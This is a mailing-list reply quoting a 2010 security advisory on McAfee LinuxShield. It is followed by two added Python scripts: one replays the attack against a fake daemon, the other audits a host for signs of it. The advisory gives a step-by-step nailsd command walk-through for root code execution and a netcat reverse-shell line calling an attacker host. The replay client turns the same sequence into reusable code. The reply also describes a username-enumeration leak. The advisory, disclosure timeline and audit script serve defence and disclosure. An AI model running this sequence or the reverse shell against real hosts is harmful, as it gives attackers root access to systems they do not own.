
Re: NSOADV-2010-004: McAfee LinuxShield remote/local code execution



ACK! You can find users who can log in to the web interface with this trick.


Am 03.03.2010 09:14, schrieb Veal, Richard:
> 
> I believe there could also be a remote user enumeration using this
> service - when attempting to log into the web interface using an
> invalid username / any password you get "Error: bad credentials", but
> when attempting to log in with a valid username / invalid password you
> seem to get:
> 
> "Error: bad credentials
> Error Information
> Error Code 	Description
> 34 	authentication failure"
> 
> Version 1.5.1, anyone confirm? Has this been mentioned before?
> 
> 
> Rich
> 
> 
> 
> -----Original Message-----
> From: NSO Research [mailto:nso-research@xxxxxxxxxx] 
> Sent: 02 March 2010 21:30
> To: bugtraq@xxxxxxxxxxxxxxxxx
> Subject: NSOADV-2010-004: McAfee LinuxShield remote/local code execution
> 
> ______________________________________________________________________
> 
> NSOADV-2010-004: McAfee LinuxShield remote/local code execution
> ______________________________________________________________________
> ______________________________________________________________________
> 
>                                111101111
>                         11111 00110 00110001111
>                    111111 01 01 1 11111011111111
>                 11111  0 11 01 0 11 1 1  111011001
>              11111111101 1 11 0110111  1    1111101111
>            1001  0 1 10 11 0 10 11 1111111  1 111 111001
>          111111111 0 10 1111 0 11 11 111111111 1 1101 10
>         00111 0 0 11 00 0 1110 1 1011111111111 1111111 11  100
>        10111111 0 01 0  1 1 111110 11 1111111111111  11110000011
>        0111111110 0110 1110 1 0 11101111111111111011 11100  00
>        01111 0 10 1110 1 011111 1 111111111111111111111101 01
>        01110 0 10 111110 110 0 11101111111111111111101111101
>       111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111
>       111110110 10 0111110 1 0 0 1111111111111111111111111 110
>     111 11111 1  1 111 1   10011 101111111111011111111 0   1100
>    111 10  110 101011110010   11111111111111111111111 11 0011100
>    11 10     001100     0001      111111111111111111 10 11 11110
>   11110       00100      00001     10 1  1111  101010001 11111111
>   11101        0  1011     10000    00100 11100        00001101 0
>   0110         111011011             0110   10001        101 11110
>   1011                 1             10 101   000001        01   00
>    1010 1                              11001      1 1        101  10
>       110101011                          0 101                 11110
>             110000011
>                       111
> ______________________________________________________________________
> ______________________________________________________________________
> 
>   Title:                  McAfee LinuxShield remote/local code
>                           execution
>   Severity:               Medium
>   Advisory ID:            NSOADV-2010-004
>   Found Date:             07.12.2009
>   Date Reported:          05.02.2010
>   Release Date:           02.03.2010
>   Author:                 Nikolas Sotiriu (lofi)
>   Website:                http://sotiriu.de
>   Twitter:                http://twitter.com/nsoresearch
>   Mail:                   nso-research at sotiriu.de
>   URL:                    http://sotiriu.de/adv/NSOADV-2010-004.txt
>   Vendor:                 McAfee (http://www.mcafee.com/)
>   Affected Products:      McAfee LinuxShield <= 1.5.1
>   Not Affected Products:  McAfee LinuxShield 1.5.1 with HF550192
>   Remote Exploitable:     Yes (attacker must be authenticated)
>   Local Exploitable:      Yes
>   Patch Status:           Vendor released a patch (See Solution)
>   Discovered by:          Nikolas Sotiriu
>   Thanks to:              Thierry Zoller: For the permission to use his
>                                           Policy
> 
> 
> Background:
> ===========
> 
> LinuxShield detects and removes viruses and other potentially unwanted
> software on Linux-based systems. LinuxShield uses the powerful McAfee
> scanning engine - the engine common to all our anti-virus products.
> 
> Although a few years ago, the Linux operating system was considered a
> secure environment, it is now seeing more occurrences of software
> specifically written to attack or exploit security weaknesses in
> Linux-based systems. Increasingly, Linux-based systems interact with
> Windows-based computers. Although viruses written to attack Windows-
> based systems do not directly attack Linux systems, a Linux server can
> harbor these viruses, ready to infect any client that connects to it.
> 
> When installed on your Linux systems, LinuxShield provides protection
> against viruses, Trojan horses, and other types of potentially unwanted
> software.
> 
> LinuxShield scans files as they are opened and closed - a technique
> known as on-access scanning. LinuxShield also incorporates an on-demand
> scanner that enables you to scan any directory or file in your host at
> any time.
> 
> When kept up-to-date with the latest virus-definition (DAT) files,
> LinuxShield is an important part of your network security. We recommend
> that you set up an anti-virus security policy for your network,
> incorporating as many protective measures as possible.
> 
> LinuxShield uses a web-browser interface, and a large number of
> LinuxShield installations can be centrally controlled by ePolicy
> Orchestrator.
> 
> (Product description from LinuxShield Product Guide)
> 
> 
> 
> Description:
> ============
> 
> This vulnerability allows remote attackers to execute arbitrary code on
> vulnerable installations of McAfee LinuxShield. User interaction is not
> required to exploit this vulnerability but an attacker must be
> authenticated.
> 
> The LinuxShield web interface communicates with the locally installed
> "nailsd" daemon, which listens on port 65443/tcp, to make configuration
> changes, query the configuration and execute tasks.
> 
> Each user who can log in to the victim box can also authenticate to
> "nailsd" and can make configuration changes and execute tasks with
> root privileges.
> 
> Direct execution of commands is not possible, but it is possible to
> download and execute code by manipulating the configuration and
> executing scheduled tasks of LinuxShield.
> 
> 
> walk-through (after the TLS handshake):
> +--------------------------------------
> 
> nailsd  > +OK welcome to the NAILS Statistics Service
> attacker> auth <user> <pass>
> nailsd  > +OK successful authentication
> 
> # Set the attacker repository to download our code from an httpd
> # (catalog.z)
> #---------------------------------------------------------------
> attacker> db set 1 _table=repository status=1 siteList=<?xml\ version
>           ="1.0"\ encoding="UTF-8"?><ns:SiteLists\ xmlns:ns="naSiteLi
>           st"\ GlobalVersion="20030131003110"\ LocalVersion="20091209
>           161903"\ Type="Client"><SiteList\ Default="1"\ Name="SomeGU
>           ID"><HttpSite\ Type="repository"\ Name="EvilRepo"\ Order="1
>           "\ Server="<attackerhost>:80"\ Enabled="1"\ Local="1"><Rela
>           tivePath>nai</RelativePath><UseAuth>0</UseAuth><UserName></
>           UserName><Password\ Encrypted="0"/></HttpSite></SiteList></
>           ns:SiteLists> _cmd=update
> nailsd  > +OK database changes buffered.
> 
> # Execute task to set the attacker repository
> #---------------------------------------------------------------
> attacker> task setsitelist
> nailsd  > +OK setting sitelist from CMA.
> 
> # Execute the default Update task to download the code
> #---------------------------------------------------------------
> attacker> task nstart LinuxShield Update
> nailsd  > +OK task LinuxShield Update starting
> 
> # Create a scan profile which executes our code. The profiles are
> # not stored in the database.
> # Scan profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
> #---------------------------------------------------------------
> attacker> sconf ODS_99 begin
> nailsd  > +OK 1260400888
> 
> # Set the variable "nailsd.profile.ODS_99.scannerPath" to the path
> # where our earlier downloaded catalog.z file is stored.
> # (/opt/McAfee/cma/scratch/update/catalog.z)
> #---------------------------------------------------------------
> attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=
>           true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O
>           DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=
>           10000 nailsd.profile.ODS_99.datPath=/opt/NAI/LinuxShield/eng
>           ine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro
>           file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD
>           ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en
>           ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd
>           .profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu
>           risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru
>           e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99
>           .mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi
>           le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil
>           dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
>           e nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr
>           ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm
>           o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile
>           .ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
>           rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
>           ch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
>           00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
>           ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
>           ter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
>            nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
>           ofile.ODS_99.filter.extensions.type=extension nailsd.profil
>           e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99
>           .action.Default.secondary=Quarantine nailsd.profile.ODS_99.
>           action.App.primary=Clean nailsd.profile.ODS_99.action.App.s
>           econdary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa
>           ss nailsd.profile.ODS_99.action.error=Block
> nailsd  > +OK configuration changes buffered
> attacker> sconf ODS_99 commit 1260400888
> nailsd  > +OK configuration changes stored
> 
> # Set a scan task with the manipulated profile to execute the code
> #---------------------------------------------------------------
> attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy
>           pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
>           mp;exclude:false timetable=type=unscheduled taskResults=0 i
>           _lastRun=1260318482 status=Stopped _cmd=insert
> nailsd  > +OK database changes buffered.
> 
> # Execute scan task to execute the code
> #---------------------------------------------------------------
> attacker> task nstart Evil Task
> 
> +-------------------------------------- walk-through EOF
> 
> 
> To get a reverse root shell, place something like this in catalog.z:
> 
> --- snip ---
> #!/bin/sh
> nc -nv <attacker_host> 4444 -e /bin/sh
> --- /snip ---
> 
> 
> 
> Proof of Concept :
> ==================
> 
> http://sotiriu.de/software/NSOPOC-2010-004.tar.gz
> 
> 
> 
> Solution:
> =========
> 
> McAfee Advisory
> +--------------
> https://kc.mcafee.com/corporate/index?page=content&id=SB10007
> 
> 
> 
> Disclosure Timeline (YYYY/MM/DD):
> =================================
> 
> 2009.12.07: Vulnerability found
> 2010.02.03: Asked vendor for a PGP key
> 2010.02.05: Vendor sent his PGP key
> 2010.02.05: Sent PoC, advisory, disclosure policy and planned disclosure
>             date (2010.02.18) to vendor
> 2010.02.05: Vendor acknowledges receipt of the advisory
> 2010.02.16: Asked for a status update, because the planned release date
>             is 2010.02.18.
> 2010.02.16: Vendor responds that they are currently working on a patch
> 2010.02.17: Changed release date to 2010.02.25.
> 2010.02.22: Vendor gives a status update that they are able to release
>             the patch on 2010.02.25.
> 2010.02.24: Asked for a list of affected products and the advisory URL.
> 2010.02.24: Vendor sends the list.
> 2010.03.02: Release of this advisory
> 
> 
> 
> 
> 
> 
> 
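The nailsd exchange from the advisory's walk-through, as a scripted client. This is an added example written for this page, not code from the advisory, its PoC tarball or McAfee. NailsClient speaks the line protocol the way the quoted transcript shows it (one command per line, a "+OK ..." reply on success); nailsd itself is replaced by FakeNailsd, a constructed in-memory stand-in that answers with the replies quoted above and records what an authenticated caller changed, so the script runs offline. The "-ERR" wording for refused commands, the account alice/s3cret and the repository address 203.0.113.10 are assumptions, not taken from the page.

```python
"""Scripted replay of the nailsd exchange quoted in NSOADV-2010-004.

Added example; not code from the advisory, its PoC or McAfee. The client
speaks the line protocol as the walk-through shows it ("+OK ..." on
success). FakeNailsd is a constructed stand-in that answers with the
replies quoted in the advisory. Assumed: the "-ERR" wording for refusals.
"""


class NailsError(Exception):
    """nailsd answered with anything other than +OK."""


class FakeNailsd:
    def __init__(self, users):
        self.users = users                 # {username: password} of local accounts
        self.authed = False
        self.pending = ["+OK welcome to the NAILS Statistics Service"]
        self.db_writes = []                # accepted "db set" lines
        self.sconf = {}                    # profile -> [key=value, ...]
        self.tasks_started = []
        self.txn = "1260400888"            # token 'sconf begin' returned on the page

    def sendline(self, line):
        verb, _, rest = line.partition(" ")
        reply = "-ERR unknown command"     # assumed wording for refusals
        if verb == "auth":
            user, _, password = rest.partition(" ")
            self.authed = self.users.get(user) == password
            reply = "+OK successful authentication" if self.authed else "-ERR authentication failure"
        elif not self.authed:
            reply = "-ERR not authenticated"
        elif verb == "db":
            self.db_writes.append(rest)
            reply = "+OK database changes buffered."
        elif verb == "task" and rest == "setsitelist":
            reply = "+OK setting sitelist from CMA."
        elif verb == "task" and rest.startswith("nstart "):
            self.tasks_started.append(rest[7:])
            reply = f"+OK task {rest[7:]} starting"
        elif verb == "sconf":
            profile, _, op = rest.partition(" ")
            words = op.split(" ")
            if words[0] == "begin":
                reply = f"+OK {self.txn}"
            elif words[:2] == ["set", self.txn]:
                self.sconf.setdefault(profile, []).extend(words[2:])
                reply = "+OK configuration changes buffered"
            elif words[:2] == ["commit", self.txn]:
                reply = "+OK configuration changes stored"
        self.pending.append(reply)

    def readline(self):
        return self.pending.pop(0)


class NailsClient:
    """Works with any transport exposing sendline(str) and readline() -> str;
    against a real host, wrap an ssl-wrapped socket to 65443/tcp the same way."""

    def __init__(self, transport):
        self.t = transport
        self.cmd_ok(self.t.readline())     # banner

    @staticmethod
    def cmd_ok(reply):
        if not reply.startswith("+OK"):
            raise NailsError(reply)
        return reply[3:].strip()

    def raw(self, line):
        self.t.sendline(line)
        return self.t.readline()

    def cmd(self, line):
        return self.cmd_ok(self.raw(line))


def replay_walkthrough(client, repo_host):
    """The advisory's sequence on an authenticated client; repo_host is the
    HTTP server that will serve catalog.z. Returns the last reply."""
    site_list = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<ns:SiteLists xmlns:ns="naSiteList" GlobalVersion="20030131003110" '
        'LocalVersion="20091209161903" Type="Client"><SiteList Default="1" Name="SomeGUID">'
        f'<HttpSite Type="repository" Name="EvilRepo" Order="1" Server="{repo_host}:80" '
        'Enabled="1" Local="1"><RelativePath>nai</RelativePath><UseAuth>0</UseAuth>'
        '<UserName></UserName><Password Encrypted="0"/></HttpSite></SiteList></ns:SiteLists>'
    )
    # "db set" is space-delimited, so spaces inside a value are escaped as "\ "
    client.cmd("db set 1 _table=repository status=1 siteList="
               + site_list.replace(" ", "\\ ") + " _cmd=update")
    client.cmd("task setsitelist")                  # activate the new repository
    client.cmd("task nstart LinuxShield Update")    # fetches catalog.z into scratch/update
    txn = client.cmd("sconf ODS_99 begin")
    # Subset of the profile keys the advisory sets; scannerPath is the one
    # that makes the downloaded file the "scanner" the task executes.
    settings = {"enginePath": "/opt/NAI/LinuxShield/engine/lib/liblnxfv.so",
                "scannerPath": "/opt/McAfee/cma/scratch/update/catalog.z"}
    client.cmd(f"sconf ODS_99 set {txn} " + " ".join(
        f"nailsd.profile.ODS_99.{k}={v}" for k, v in settings.items()))
    client.cmd(f"sconf ODS_99 commit {txn}")
    client.cmd(f"db set {txn} _table=schedule taskName=Evil Task taskType=On-Demand "
               "taskInfo=profileName=ODS_99,paths=path:/root/tmp;exclude:false "
               "timetable=type=unscheduled taskResults=0 i_lastRun=1260318482 "
               "status=Stopped _cmd=insert")
    return client.cmd("task nstart Evil Task")
```

The point the fake makes visible is the one the advisory states: nothing past `auth` checks who is asking, so any local account that the daemon accepts gets to rewrite the repository, the scan profile and the schedule table. Against a real LinuxShield you would construct the client on a TLS socket to 65443/tcp; the fake only confirms the command sequence and the replies match the quoted transcript.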
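For anyone checking a LinuxShield host that was exposed before HF550192 landed, the walk-through leaves two artefacts worth auditing: an on-demand scan profile whose scannerPath points at something outside the product's install tree (the advisory's PoC aims it at the downloaded catalog.z under /opt/McAfee/cma/scratch/update/), and a repository siteList with an HttpSite pointing at a host that is not an approved update server. The audit below is an added example, not code from the advisory or from McAfee. It assumes that ods.cfg holds one key=value line per setting using the key names the advisory's sconf command shows, that /opt/NAI/LinuxShield is the trusted install tree, and that you supply the approved repository hosts; the sample config, the vendor host update.nai.com and the TEST-NET address standing in for the attacker host are constructed.

```python
"""Audit LinuxShield configuration for the abuse pattern in NSOADV-2010-004.

Added example, not code from the advisory or McAfee. Checks on-demand
scan profiles (advisory: /var/opt/NAI/LinuxShield/etc/ods.cfg) whose path
settings escape the install tree, and siteList HttpSite entries pointing
at unapproved hosts. Assumptions: ods.cfg is one key=value per line with
the key names the advisory's sconf command shows; the trusted prefix and
the approved host set are yours to supply; sample data is constructed.
"""
import posixpath
import xml.etree.ElementTree as ET
from pathlib import PurePosixPath

PROFILE_PREFIX = "nailsd.profile."
TRUSTED_PREFIXES = ("/opt/NAI/LinuxShield",)   # assumption: where a genuine scanner lives
PATH_KEYS = ("scannerPath", "enginePath", "engineLibDir", "datPath")


def parse_profiles(text):
    """Group nailsd.profile.<name>.<key>=value lines into {name: {key: value}}."""
    profiles = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        if key.startswith(PROFILE_PREFIX):
            name, _, setting = key[len(PROFILE_PREFIX):].partition(".")
            profiles.setdefault(name, {})[setting] = value
    return profiles


def under_trusted(path, prefixes=TRUSTED_PREFIXES):
    """True if the normalised path (so '..' cannot fake it) sits inside a trusted tree."""
    p = PurePosixPath(posixpath.normpath(path))
    return any(PurePosixPath(pre) in p.parents for pre in prefixes)


def suspicious_profiles(profiles, prefixes=TRUSTED_PREFIXES):
    """(profile, key, value) for every path setting that escapes the trusted tree."""
    return [(name, key, cfg[key])
            for name, cfg in profiles.items()
            for key in PATH_KEYS
            if key in cfg and not under_trusted(cfg[key], prefixes)]


def untrusted_repositories(sitelist_xml, approved_hosts):
    """(Name, Server) of enabled HttpSite entries whose host is not approved."""
    approved = {h.lower() for h in approved_hosts}
    findings = []
    for site in ET.fromstring(sitelist_xml).iter("HttpSite"):
        if site.get("Enabled", "1") != "1":
            continue
        server = site.get("Server", "")
        host = server.rsplit(":", 1)[0] if ":" in server else server
        if host.lower() not in approved:
            findings.append((site.get("Name"), server))
    return findings


def audit(ods_cfg_text, sitelist_xml, approved_hosts, prefixes=TRUSTED_PREFIXES):
    return {
        "profiles": suspicious_profiles(parse_profiles(ods_cfg_text), prefixes),
        "repositories": untrusted_repositories(sitelist_xml, approved_hosts),
    }


# Constructed sample: a benign profile (placeholder scanner path) plus the
# ODS_99 profile the advisory builds.
SAMPLE_ODS_CFG = """\
nailsd.profile.ODS_1.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so
nailsd.profile.ODS_1.scannerPath=/opt/NAI/LinuxShield/bin/scanner
nailsd.profile.ODS_99.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so
nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scratch/update/catalog.z
"""

# Constructed sample: a vendor repository plus the EvilRepo entry from the
# advisory, with a TEST-NET address standing in for <attackerhost>.
SAMPLE_SITELIST = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<ns:SiteLists xmlns:ns="naSiteList" Type="Client"><SiteList Default="1" Name="SomeGUID">'
    '<HttpSite Type="repository" Name="NAIHttp" Order="1" Server="update.nai.com:80" Enabled="1">'
    '<RelativePath>nai</RelativePath></HttpSite>'
    '<HttpSite Type="repository" Name="EvilRepo" Order="2" Server="203.0.113.10:80" Enabled="1" Local="1">'
    '<RelativePath>nai</RelativePath><UseAuth>0</UseAuth></HttpSite>'
    '</SiteList></ns:SiteLists>'
)

if __name__ == "__main__":
    for kind, hits in audit(SAMPLE_ODS_CFG, SAMPLE_SITELIST, {"update.nai.com"}).items():
        for hit in hits:
            print(kind, *hit)
```

On a live host the inputs come from ods.cfg and from whatever the installation holds as its siteList (the advisory writes it through the repository table, so the web interface's repository view is the place to read it back); the path check normalises before comparing so a value such as /opt/NAI/LinuxShield/../../McAfee/cma/scratch/update/catalog.z is still flagged.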